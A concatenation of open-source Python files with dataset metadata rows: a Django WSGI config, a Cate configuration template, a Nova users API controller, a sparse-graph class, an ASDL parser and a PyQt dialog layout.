tripLonMin = 0
tripLonMax = 0
triplineBlankets = []
def __init__(self, config, basePath = "./"):
configParser = SafeConfigParser()
configParser.read(basePath + config)
self.config_file = config
self.database_name = configParser.get("AggregateMicroPath", "database_name")
self.table_name = configParser.get("AggregateMicroPath", "table_name")
self.table_schema_id = configParser.get("AggregateMicroPath", "table_schema_id")
self.table_schema_dt = configParser.get("AggregateMicroPath", "table_schema_dt")
self.table_schema_lat = configParser.get("AggregateMicroPath", "table_schema_lat")
self.table_schema_lon = configParser.get("AggregateMicroPath", "table_schema_lon")
        self.time_filter = int(configParser.get("AggregateMicroPath", "time_filter"))
        self.distance_filter = int(configParser.get("AggregateMicroPath", "distance_filter"))
self.tripLat1 = float(configParser.get("AggregateMicroPath", "lower_left_lat"))
self.tripLon1 = float(configParser.get("AggregateMicroPath", "lower_left_lon"))
self.tripLat2 = float(configParser.get("AggregateMicroPath", "upper_right_lat"))
self.tripLon2 = float(configParser.get("AggregateMicroPath", "upper_right_lon"))
self.tripname = configParser.get("AggregateMicroPath", "trip_name")
self.resolutionLat = float(configParser.get("AggregateMicroPath", "resolution_lat"))
self.resolutionLon = float(configParser.get("AggregateMicroPath", "resolution_lon"))
self.tripLatMin = int(math.floor(self.tripLat1/self.resolutionLat))#6
self.tripLatMax = int(math.ceil(self.tripLat2/self.resolutionLat)) #7
self.tripLonMin = int(math.floor(self.tripLon1/self.resolutionLon)) #8
self.tripLonMax = int(math.ceil(self.tripLon2/self.resolutionLon)) #9
self.triplineBlankets.append([self.tripLat1,self.tripLon1,self.tripLat2,self.tripLon2,self.tripname,self.resolutionLat,self.resolutionLon,self.tripLatMin,self.tripLatMax,self.tripLonMin,self.tripLonMax])
self.temporal_split = configParser.get("AggregateMicroPath", "temporal_split")
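# A minimal configuration file the constructor above can parse (a sketch: the
# section and key names come from the get() calls above, the values are
# illustrative):
#
# [AggregateMicroPath]
# database_name = micro_path_db
# table_name = tracks
# table_schema_id = vehicle_id
# table_schema_dt = dt
# table_schema_lat = latitude
# table_schema_lon = longitude
# time_filter = 3600
# distance_filter = 50000
# lower_left_lat = 29.0
# lower_left_lon = -98.0
# upper_right_lat = 31.0
# upper_right_lon = -94.0
# trip_name = test_trip
# resolution_lat = 0.1
# resolution_lon = 0.1
# temporal_split = hour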
|
xualex/DjangoTutorial
|
alex/alex/wsgi.py
|
Python
|
mit
| 386 | 0 |
"""
WSGI config for alex project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproj
|
ect.co
|
m/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alex.settings")
application = get_wsgi_application()
|
CCI-Tools/cate-core
|
cate/conf/template.py
|
Python
|
mit
| 5,327 | 0.007509 |
################################################################################
# This is a Cate configuration file. #
# #
# If this file is "~/.cate/conf.py", it is the active Cate configuration. #
#
|
#
# If this file is named "conf.py.template" you can rename it and move #
# it "~/.cate/conf.py" to make it the active Cate configuration file. #
# #
# As this is a regular Python script, you may
|
use any Python code to compute #
# the settings provided here. #
# #
# Please find the configuration template for a given Cate VERSION at #
# https://github.com/CCI-Tools/cate/blob/vVERSION/cate/conf/template.py #
# For example: #
# https://github.com/CCI-Tools/cate/blob/v2.0.0.dev4/cate/conf/template.py #
################################################################################
# 'data_stores_path' denotes a directory where Cate stores information about data stores and also saves
# local data files synchronized with their remote versions.
# Use the tilde '~' (also on Windows) within the path to point to your home directory.
#
# data_stores_path = '~/.cate/data_stores'
# 'dataset_persistence_format' names the data format to be used when persisting datasets in the workspace.
# Possible values are 'netcdf4' or 'zarr'.
# dataset_persistence_format = 'netcdf4'
# If 'use_workspace_imagery_cache' is True, Cate will maintain a per-workspace
# cache for imagery generated from dataset variables. Such cache can accelerate
# image display, however at the cost of disk space.
#
# use_workspace_imagery_cache = False
# Default prefix for names generated for new workspace resources originating from opening data sources
# or executing workflow steps.
# This prefix is used only if no specific prefix is defined for a given operation.
# default_res_pattern = 'res_{index}'
# User defined HTTP proxy settings, will replace one stored in System environment variable 'http_proxy'
# Accepted proxy details formats:
# 'http://user:password@host:port'
# 'https://user:password@host:port'
# 'http://host:port'
# 'https://host:port'
# http_proxy =
# Include/exclude data sources (currently effective in Cate Desktop GUI only, not used by API, CLI).
#
# If 'included_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be included. By default, or if 'included_data_sources' is None, all data sources are included.
# If 'excluded_data_sources' is a list, its entries are expected to be wildcard patterns for the identifiers of data
# sources to be excluded. By default, or if 'excluded_data_sources' is None, no data sources are excluded.
# If both 'included_data_sources' and 'excluded_data_sources' are lists, we first include data sources using
# 'included_data_sources' then remove entries that match any result from applying 'excluded_data_sources'.
#
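# Example (illustrative patterns, using the variable names actually read below):
# keep only ozone data sources, then drop the daily-resolution ones from that
# selection:
#
# included_ds_ids = ['esacci.OZONE.*']
# excluded_ds_ids = ['esacci.*.day.*']
#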
# We put wildcards here that match all data sources that are known to work in GUI
# included_ds_ids = []
# We put wildcards here that match all data sources that are known NOT to work in GUI
excluded_ds_ids = [
# Exclude datasets that usually take too long to download or cannot be easily aggregated
# e.g.
# 'esacci.*.day.*',
# 'esacci.*.satellite-orbit-frequency.*',
# 'esacci.LC.*',
]
# Configure names of variables that will be initially selected once a new
# dataset resource is opened in the GUI.
# default_variables = {
# 'cfc', # Cloud CCI
# 'lccs_class', # Land Cover CCI
# 'analysed_sst', # Sea Surface Temperature CCI
# }
# Configure / overwrite default variable display settings as used in various plot_<type>() operations
# and in the Cate Desktop GUI.
# Each entry maps a variable name to a dictionary with the following entries:
# color_map - name of a color map taken from from https://matplotlib.org/examples/color/colormaps_reference.html
# display_min - minimum variable value that corresponds to the lower end of the color map
# display_max - maximum variable value that corresponds to the upper end of the color map
#
# variable_display_settings = {
# 'my_var': dict(color_map='viridis', display_min=0.1, display_max=0.8),
# }
# Default color map to be used for any variable not configured in 'variable_display_settings'
# 'default_color_map' must be the name of a color map taken from from
# https://matplotlib.org/examples/color/colormaps_reference.html
# default_color_map = 'jet'
default_color_map = 'inferno'
# Data Store Configurations
# Load from here the configurations of the data stores that will eventually be loaded into cate
store_configs = {
"local": {
"store_id": "directory",
"store_params": {
"base_dir": "",
}
},
"cci-store": {
"store_id": "cciodp"
},
"cds-store": {
"store_id": "cds"
}
}
|
superstack/nova
|
nova/api/openstack/users.py
|
Python
|
apache-2.0
| 3,531 | 0.000283 |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
|
under the License.
from webob import exc
from nova import exception
from nova imp
|
ort flags
from nova import log as logging
from nova.api.openstack import common
from nova.api.openstack import faults
from nova.auth import manager
FLAGS = flags.FLAGS
LOG = logging.getLogger('nova.api.openstack')
def _translate_keys(user):
return dict(id=user.id,
name=user.name,
access=user.access,
secret=user.secret,
admin=user.admin)
class Controller(common.OpenstackController):
_serialization_metadata = {
'application/xml': {
"attributes": {
"user": ["id", "name", "access", "secret", "admin"]}}}
def __init__(self):
self.manager = manager.AuthManager()
def _check_admin(self, context):
"""We cannot depend on the db layer to check for admin access
for the auth manager, so we do it here"""
if not context.is_admin:
raise exception.AdminRequired()
def index(self, req):
"""Return all users in brief"""
users = self.manager.get_users()
users = common.limited(users, req)
users = [_translate_keys(user) for user in users]
return dict(users=users)
def detail(self, req):
"""Return all users in detail"""
return self.index(req)
def show(self, req, id):
"""Return data about the given user id"""
#NOTE(justinsb): The drivers are a little inconsistent in how they
# deal with "NotFound" - some throw, some return None.
try:
user = self.manager.get_user(id)
except exception.NotFound:
user = None
if user is None:
raise faults.Fault(exc.HTTPNotFound())
return dict(user=_translate_keys(user))
def delete(self, req, id):
self._check_admin(req.environ['nova.context'])
self.manager.delete_user(id)
return {}
def create(self, req):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin') in ('T', 'True', True)
name = env['user'].get('name')
access = env['user'].get('access')
secret = env['user'].get('secret')
user = self.manager.create_user(name, access, secret, is_admin)
return dict(user=_translate_keys(user))
def update(self, req, id):
self._check_admin(req.environ['nova.context'])
env = self._deserialize(req.body, req.get_content_type())
is_admin = env['user'].get('admin')
if is_admin is not None:
is_admin = is_admin in ('T', 'True', True)
access = env['user'].get('access')
secret = env['user'].get('secret')
self.manager.modify_user(id, access, secret, is_admin)
return dict(user=_translate_keys(self.manager.get_user(id)))
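# Example request body that create() and update() above expect after
# _deserialize() (a sketch; the field values are illustrative):
#
# {"user": {"name": "alice", "access": "access-key", "secret": "secret-key", "admin": "True"}}
#
# Note that "admin" only counts as true when it deserializes to 'T', 'True' or
# the boolean True, as checked in create().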
|
charanpald/APGL
|
apgl/graph/SparseGraph.py
|
Python
|
bsd-3-clause
| 19,320 | 0.008023 |
from apgl.graph.AbstractMatrixGraph import AbstractMatrixGraph
from apgl.graph.AbstractVertexList import AbstractVertexList
from apgl.graph.GeneralVertexList import GeneralVertexList
from apgl.graph.VertexList import VertexList
from apgl.util.Util import Util
from apgl.util.SparseUtils import SparseUtils
from apgl.util.Parameter import Parameter
import scipy.sparse as sparse
import scipy.io
import numpy
class SparseGraph(AbstractMatrixGraph):
'''
Represents a graph, which can be directed or undirected, and has weights
on the edges. Memory usage is efficient for sparse graphs. The list of vertices
is immutable (see VertexList), however edges can be added or removed. Only
non-zero edges can be added. Uses scipy.sparse for the underlying matrix
representation.
'''
def __init__(self, vertices, undirected=True, W=None, dtype=numpy.float, frmt="csr"):
"""
Create a SparseGraph with a given AbstractVertexList or number of
vertices, and specify whether it is directed. One can optionally pass
in a sparse matrix W which is used as the weight matrix of the
graph. Different kinds of sparse matrix can impact the speed of various
operations. The currently supported sparse matrix types are: lil_matrix,
csr_matrix, csc_matrix and dok_matrix. The default sparse matrix is
csr_matrix.
:param vertices: the initial set of vertices as a AbstractVertexList object, or an int to specify the number of vertices in which case vertices are stored in a GeneralVertexList.
:param undirected: a boolean variable to indicate if the graph is undirected.
:type undirected: :class:`boolean`
:param W: a square sparse matrix of the same size as the number of vertices, or None to create the default one.
:param dtype: the data type of the sparse matrix if W is not specified.
:param frmt: the format of the sparse matrix: lil, csr or csc if W is not specified
"""
Parameter.checkBoolean(undirected)
if isinstance(vertices, AbstractVertexList):
self.vList = vertices
elif isinstance(vertices, int):
self.vList = GeneralVertexList(vertices)
else:
raise ValueError("Invalid vList parameter: " + str(vertices))
        if W is not None and not (sparse.issparse(W) and W.shape == (self.vList.getNumVertices(), self.vList.getNumVertices())):
raise ValueError("Input argument W must be None or sparse matrix of size " + str(self.vList.getNumVertices()) )
self.undirected = undirected
if frmt=="lil":
matrix = sparse.lil_matrix
elif frmt=="csr":
matrix = sparse.csr_matrix
elif frmt=="csc":
matrix = sparse.csc_matrix
else:
raise ValueError("Invalid sparse matrix format: " + frmt)
#Terrible hack alert: can't create a zero size sparse matrix, so we settle
#for one of size 1. Better is to create a new class.
        if self.vList.getNumVertices() == 0 and W is None:
self.W = matrix((1, 1), dtype=dtype)
        elif W is None:
self.W = matrix((self.vList.getNumVertices(), self.vList.getNumVertices()), dtype=dtype)
else:
self.W = W
#The next line is for error checking mainly
self.setWeightMatrix(W)
def neighbours(self, vertexIndex):
"""
Return an array of the indices of neighbours. In the case of a directed
graph it is an array of those vertices connected by an edge from the current
one.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all neigbours of the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
#neighbours = self.W[vertexIndex, :].nonzero()[1]
neighbours = self.W.getrow(vertexIndex).nonzero()[1]
#neighbours = numpy.nonzero(self.W.getrow(vertexIndex).toarray())[1]
return neighbours
def neighbourOf(self, vertexIndex):
"""
Return an array of the indices of vertices than have an edge going to the input
vertex.
:param vertexIndex: the index of a vertex.
:type vertexIndex: :class:`int`
:returns: An array of the indices of all vertices with an edge towards the input vertex.
"""
Parameter.checkIndex(vertexIndex, 0, self.vList.getNumVertices())
nonZeroInds = self.W[:, vertexIndex].nonzero()
neighbours = nonZeroInds[0]
return neighbours
def getNumEdges(self):
"""
:returns: the total number of edges in this graph.
"""
if self.getNumVertices()==0:
return 0
#Note that self.W.getnnz() doesn't seem to work correctly
if self.undirected == True:
return (self.W.nonzero()[0].shape[0] + numpy.sum(SparseUtils.diag(self.W) != 0))/2
else:
return self.W.nonzero()[0].shape[0]
def getNumDirEdges(self):
"""
:returns: the number of edges, taking this graph as a directed graph.
"""
return self.W.nonzero()[0].shape[0]
def outDegreeSequence(self):
"""
:returns: a vector of the (out)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(1), dtype=numpy.int32).ravel()
return degrees
def inDegreeSequence(self):
"""
:returns: a vector of the (in)degree sequence for each vertex.
"""
A = self.nativeAdjacencyMatrix()
degrees = numpy.array(A.sum(0), dtype=numpy.int32).ravel()
return degrees
def subgraph(self, vertexIndices):
"""
Pass in a list or set of vertexIndices and returns the subgraph containi
|
ng
those vertices only, and edges between them. The subgraph indices correspond
to the sorted input indices.
:param vertexIndices: the indices of the subgraph vertices.
:type vertexIndices: :class:`list`
:returns: A new SparseGraph containing only vertices and edges from vertexIndice
|
s
"""
Parameter.checkList(vertexIndices, Parameter.checkIndex, (0, self.getNumVertices()))
vertexIndices = numpy.unique(numpy.array(vertexIndices)).tolist()
vList = self.vList.subList(vertexIndices)
subGraph = SparseGraph(vList, self.undirected)
if len(vertexIndices) != 0:
subGraph.W = self.W[vertexIndices, :][:, vertexIndices]
return subGraph
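    # Usage sketch (not part of the original class, shown doctest-style as a
    # comment so the class body stays untouched). It relies only on the
    # constructor and the methods defined above:
    #
    # >>> import numpy
    # >>> import scipy.sparse as sparse
    # >>> W = sparse.csr_matrix(numpy.array([[0., 1., 0.], [1., 0., 1.], [0., 1., 0.]]))
    # >>> g = SparseGraph(3, undirected=True, W=W)
    # >>> list(g.neighbours(1))
    # [0, 2]
    # >>> g.getNumDirEdges()
    # 4
    # >>> g.subgraph([0, 1]).getSparseWeightMatrix().shape
    # (2, 2)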
def getWeightMatrix(self):
"""
Return the weight matrix in dense format. Warning: should not be used
unless sufficient memory is available to store the dense matrix.
:returns: A numpy.ndarray weight matrix.
"""
if self.getVertexList().getNumVertices() != 0:
return self.W.toarray()
else:
return numpy.zeros((0, 0))
def getSparseWeightMatrix(self):
"""
Returns the original sparse weight matrix.
:returns: A scipy.sparse weight matrix.
"""
return self.W
def add(self, graph):
"""
Add the edge weights of the input graph to the current one. Results in a
union of the edges.
:param graph: the input graph.
:type graph: :class:`apgl.graph.SparseGraph`
:returns: A new graph with same vertex list and addition of edge weights
"""
Parameter.checkClass(graph, SparseGraph)
if graph.getNumVertices() != self.getNumVertices():
raise ValueError("Can only add edges from graph with same number of vertices")
if self.undirected != graph.undirected:
|
shiquanwang/numba
|
numba/asdl/common/asdl.py
|
Python
|
bsd-2-clause
| 13,170 | 0.001974 |
# -*- coding: utf-8 -*-
"""An implementation of the Zephyr Abstract Syntax Definition Language.
See http://asdl.sourceforge.net/ and
http://www.cs.princeton.edu/research/techreps/TR-554-97
Only supports top level module decl, not view. I'm guessing that view
is intended to support the browser and I'm not interested in the
browser.
Changes for Python: Add support for module versions
"""
from __future__ import print_function, division, absolute_import
import os
import traceback
from . import spark
class Token(object):
# spark seems to dispatch in the parser based on a token's
# type attribute
def __init__(self, type, lineno):
self.type = type
self.lineno = lineno
def __str__(self):
return self.type
def __repr__(self):
return str(self)
class Id(Token):
def __init__(self, value, lineno):
self.type = 'Id'
self.value = value
self.lineno = lineno
def __str__(self):
return self.value
class String(Token):
def __init__(self, value, lineno):
self.type = 'String'
self.value = value
self.lineno = lineno
class ASDLSyntaxError(Exception):
def __init__(self, lineno, token=None, msg=None):
self.lineno = lineno
self.token = token
self.msg = msg
def __str__(self):
if self.msg is None:
return "Error at '%s', line %d" % (self.token, self.lineno)
else:
return "%s, line %d" % (self.msg, self.lineno)
class ASDLScanner(spark.GenericScanner, object):
def tokenize(self, input):
self.rv = []
self.lineno = 1
super(ASDLScanner, self).tokenize(input)
return self.rv
def t_id(self, s):
r"[\w\.]+"
# XXX doesn't distinguish upper vs. lower, which is
# significant for ASDL.
self.rv.append(Id(s, self.lineno))
def t_string(self, s):
r'"[^"]*"'
self.rv.append(String(s, self.lineno))
def t_xxx(self, s): # not sure what this production means
r"<="
self.rv.append(Token(s, self.lineno))
def t_punctuation(self, s):
r"[\{\}\*\=\|\(\)\,\?\:]"
self.rv.append(Token(s, self.lineno))
def t_comment(self, s):
r"\-\-[^\n]*"
pass
def t_newline(self, s):
r"\n"
self.lineno += 1
def t_whitespace(self, s):
r"[ \t]+"
pass
def t_default(self, s):
r" . +"
raise ValueError("unmatched input: %r" % s)
class ASDLParser(spark.GenericParser, object):
def __init__(self):
super(ASDLParser, self).__init__("module")
def typestring(self, tok):
return tok.type
def error(self, tok):
raise ASDLSyntaxError(tok.lineno, tok)
def p_module_0(self, xxx_todo_changeme):
" module ::= Id Id version { } "
(module, name, version, _0, _1) = xxx_todo_changeme
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, version)
def p_module(self, xxx_todo_changeme1):
" module ::= Id Id version { definitions } "
(module, name, version, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, definitions, version)
def p_module_1(self, xxx_todo_changeme1):
" module ::= Id Id { } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name, None, None)
def p_module_2(self, xxx_todo_changeme1):
" module ::= Id Id { definitions } "
(module, name, _0, definitions, _1) = xxx_todo_changeme1
if module.value != "module":
raise ASDLSyntaxError(module.lineno,
msg="expected 'module', found %s" % module)
return Module(name
|
, definitions, None)
def p_version(self, xxx_todo_changeme2):
"version ::= Id String"
(ve
|
rsion, V) = xxx_todo_changeme2
if version.value != "version":
raise ASDLSyntaxError(version.lineno,
msg="expected 'version', found %" % version)
return V
def p_definition_0(self, xxx_todo_changeme3):
" definitions ::= definition "
(definition,) = xxx_todo_changeme3
return definition
def p_definition_1(self, xxx_todo_changeme4):
" definitions ::= definition definitions "
(definitions, definition) = xxx_todo_changeme4
return definitions + definition
def p_definition(self, xxx_todo_changeme5):
" definition ::= Id = type "
(id, _, type) = xxx_todo_changeme5
return [Type(id, type)]
def p_type_0(self, xxx_todo_changeme6):
" type ::= product "
(product,) = xxx_todo_changeme6
return product
def p_type_1(self, xxx_todo_changeme7):
" type ::= sum "
(sum,) = xxx_todo_changeme7
return Sum(sum)
def p_type_2(self, xxx_todo_changeme8):
" type ::= sum Id ( fields ) "
(sum, id, _0, attributes, _1) = xxx_todo_changeme8
if id.value != "attributes":
raise ASDLSyntaxError(id.lineno,
msg="expected attributes, found %s" % id)
if attributes:
attributes.reverse()
return Sum(sum, attributes)
def p_product(self, xxx_todo_changeme9):
" product ::= ( fields ) "
(_0, fields, _1) = xxx_todo_changeme9
fields.reverse()
return Product(fields)
def p_sum_0(self, xxx_todo_changeme10):
" sum ::= constructor "
(constructor,) = xxx_todo_changeme10
return [constructor]
def p_sum_1(self, xxx_todo_changeme11):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme11
return [constructor] + sum
def p_sum_2(self, xxx_todo_changeme12):
" sum ::= constructor | sum "
(constructor, _, sum) = xxx_todo_changeme12
return [constructor] + sum
def p_constructor_0(self, xxx_todo_changeme13):
" constructor ::= Id "
(id,) = xxx_todo_changeme13
return Constructor(id)
def p_constructor_1(self, xxx_todo_changeme14):
" constructor ::= Id ( fields ) "
(id, _0, fields, _1) = xxx_todo_changeme14
fields.reverse()
return Constructor(id, fields)
def p_fields_0(self, xxx_todo_changeme15):
" fields ::= field "
(field,) = xxx_todo_changeme15
return [field]
def p_fields_1(self, xxx_todo_changeme16):
" fields ::= field , fields "
(field, _, fields) = xxx_todo_changeme16
return fields + [field]
def p_field_0(self, xxx_todo_changeme17):
" field ::= Id "
(type,) = xxx_todo_changeme17
return Field(type)
def p_field_1(self, xxx_todo_changeme18):
" field ::= Id Id "
(type, name) = xxx_todo_changeme18
return Field(type, name)
def p_field_2(self, xxx_todo_changeme19):
" field ::= Id * Id "
(type, _, name) = xxx_todo_changeme19
return Field(type, name, seq=True)
def p_field_3(self, xxx_todo_changeme20):
" field ::= Id ? Id "
(type, _, name) = xxx_todo_changeme20
return Field(type, name, opt=True)
def p_field_4(self, xxx_todo_changeme21):
" field ::= Id * "
(type, _) = xxx_todo_changeme21
return Field(type, seq=True)
def p_field_5(self, xxx_todo_changeme22):
" field ::= Id ? "
(type, _) = xxx_todo_changeme22
return Field(type, opt=True)
builtin_types = ("identifier", "string", "int", "bool", "object", "bytes")
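# An example of the ASDL text the scanner/parser above accepts (illustrative;
# kept as a comment because it is ASDL, not Python). "--" starts a comment,
# "*" marks a sequence field, "?" an optional one, and "attributes" adds
# shared fields to a sum type:
#
# -- toy module
# module Example version "1.0"
# {
#     mod = Module(stmt* body)
#     stmt = Assign(identifier name, expr value)
#          | Pass
#     expr = Num(int n)
#          | Name(identifier id)
#          attributes (int lineno)
# }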
# below is a collection of classes to capture the AST of an AST :-)
# not sure if any of the methods are useful yet, but I'm adding them
# pieceme
|
khosrow/luma-devel
|
luma/base/gui/design/ServerDialogDesign.py
|
Python
|
gpl-2.0
| 36,277 | 0.003556 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/mnt/debris/devel/repo/git/luma-fixes/resources/forms/ServerDialogDesign.ui'
#
# Created: Wed May 25 21:41:09 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_ServerDialogDesign(object):
def setupUi(self, ServerDialogDesign):
ServerDialogDesign.setObjectName(_fromUtf8("ServerDialogDesign"))
ServerDialogDesign.resize(662, 430)
ServerDialogDesign.setMinimumSize(QtCore.QSize(550, 350))
self.vboxlayout = QtGui.QVBoxLayout(ServerDialogDesign)
self.vboxlayout.setObjectName(_fromUtf8("vboxlayout"))
self.splitter = QtGui.QSplitter(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter.sizePolicy().hasHeightForWidth())
self.splitter.setSizePolicy(sizePolicy)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName(_fromUtf8("splitter"))
self.layout3 = QtGui.QWidget(self.splitter)
self.layout3.setObjectName(_fromUtf8("layout3"))
self.serverListGrid = QtGui.QGridLayout(self.layout3)
self.serverListGrid.setMargin(0)
self.serverListGrid.setObjectName(_fromUtf8("serverListGrid"))
self.serverListView = QtGui.QListView(self.layout3)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.serverListView.sizePolicy().hasHeightForWidth())
self.serverListView.setSizePolicy(sizePolicy)
self.serverListView.setObjectName(_fromUtf8("serverListView"))
self.serverListGrid.addWidget(self.serverListView, 0, 0, 1, 2)
self.addButton = QtGui.QPushButton(self.layout3)
self.addButton.setAutoDefault(True)
self.addButton.setDefault(False)
self.addButton.setObjectName(_fromUtf8("addButton"))
self.serverListGrid.addWidget(self.addButton, 1, 0, 1, 1)
self.deleteButton = QtGui.QPushButton(self.layout3)
self.deleteButton.setAutoDefault(True)
self.deleteButton.setObjectName(_fromUtf8("deleteButton"))
self.serverListGrid.addWidget(self.deleteButton, 1, 1, 1, 1)
self.testConnectionButton = QtGui.QPushButton(self.layout3)
self.testConnectionButton.setObjectName(_fromUtf8("testConnectionButton"))
self.serverListGrid.addWidget(self.testConnectionButton, 2, 0, 1, 2)
self.tabWidget = QtGui.QTabWidget(self.splitter)
self.tabWidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(48, 48))
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.networkTab = QtGui.QWidget()
self.networkTab.setObjectName(_fromUtf8("networkTab"))
self.gridlayout = QtGui.QGridLayout(self.networkTab)
self.gridlayout.setObjectName(_fromUtf8("gridlayout"))
self.networkIcon = QtGui.QLabel(self.networkTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
si
|
zePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.networkIcon.sizePolicy().hasHeightForWidth())
self.networkIcon.setSizePolicy(sizePolicy)
self
|
.networkIcon.setMinimumSize(QtCore.QSize(48, 48))
self.networkIcon.setText(_fromUtf8(""))
self.networkIcon.setObjectName(_fromUtf8("networkIcon"))
self.gridlayout.addWidget(self.networkIcon, 0, 0, 1, 1)
self.networkOptGrid = QtGui.QGridLayout()
self.networkOptGrid.setObjectName(_fromUtf8("networkOptGrid"))
self.networkGroup = QtGui.QGroupBox(self.networkTab)
self.networkGroup.setObjectName(_fromUtf8("networkGroup"))
self.gridLayout_5 = QtGui.QGridLayout(self.networkGroup)
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.networkGrid = QtGui.QGridLayout()
self.networkGrid.setObjectName(_fromUtf8("networkGrid"))
self.hostLabel = QtGui.QLabel(self.networkGroup)
self.hostLabel.setObjectName(_fromUtf8("hostLabel"))
self.networkGrid.addWidget(self.hostLabel, 0, 0, 1, 1)
self.hostEdit = QtGui.QLineEdit(self.networkGroup)
self.hostEdit.setObjectName(_fromUtf8("hostEdit"))
self.networkGrid.addWidget(self.hostEdit, 0, 1, 1, 1)
self.portLabel = QtGui.QLabel(self.networkGroup)
self.portLabel.setObjectName(_fromUtf8("portLabel"))
self.networkGrid.addWidget(self.portLabel, 2, 0, 1, 1)
self.portSpinBox = QtGui.QSpinBox(self.networkGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.portSpinBox.sizePolicy().hasHeightForWidth())
self.portSpinBox.setSizePolicy(sizePolicy)
self.portSpinBox.setMaximum(99999)
self.portSpinBox.setProperty(_fromUtf8("value"), 389)
self.portSpinBox.setObjectName(_fromUtf8("portSpinBox"))
self.networkGrid.addWidget(self.portSpinBox, 2, 1, 1, 1)
self.gridLayout_5.addLayout(self.networkGrid, 0, 0, 1, 1)
self.networkOptGrid.addWidget(self.networkGroup, 0, 0, 1, 1)
self.LDAPGroup = QtGui.QGroupBox(self.networkTab)
self.LDAPGroup.setObjectName(_fromUtf8("LDAPGroup"))
self.gridLayout_7 = QtGui.QGridLayout(self.LDAPGroup)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.LDAPGrid = QtGui.QGridLayout()
self.LDAPGrid.setObjectName(_fromUtf8("LDAPGrid"))
self.aliasBox = QtGui.QCheckBox(self.LDAPGroup)
self.aliasBox.setEnabled(False)
self.aliasBox.setObjectName(_fromUtf8("aliasBox"))
self.LDAPGrid.addWidget(self.aliasBox, 0, 0, 1, 2)
self.baseDNBox = QtGui.QCheckBox(self.LDAPGroup)
self.baseDNBox.setObjectName(_fromUtf8("baseDNBox"))
self.LDAPGrid.addWidget(self.baseDNBox, 1, 0, 1, 2)
self.baseDNLabel = QtGui.QLabel(self.LDAPGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.baseDNLabel.sizePolicy().hasHeightForWidth())
self.baseDNLabel.setSizePolicy(sizePolicy)
self.baseDNLabel.setObjectName(_fromUtf8("baseDNLabel"))
self.LDAPGrid.addWidget(self.baseDNLabel, 2, 0, 1, 1)
self.baseDNEdit = QtGui.QLineEdit(self.LDAPGroup)
self.baseDNEdit.setObjectName(_fromUtf8("baseDNEdit"))
self.LDAPGrid.addWidget(self.baseDNEdit, 2, 1, 1, 1)
self.hLayout = QtGui.QHBoxLayout()
self.hLayout.setObjectName(_fromUtf8("hLayout"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.hLayout.addItem(spacerItem)
self.addBaseDNButton = QtGui.QPushButton(self.LDAPGroup)
self.addBaseDNButton.setAutoDefault(False)
self.addBaseDNButton.setObjectName(_fromUtf8("addBaseDNButton"))
self.hLayout.addWidget(self.addBaseDNButton)
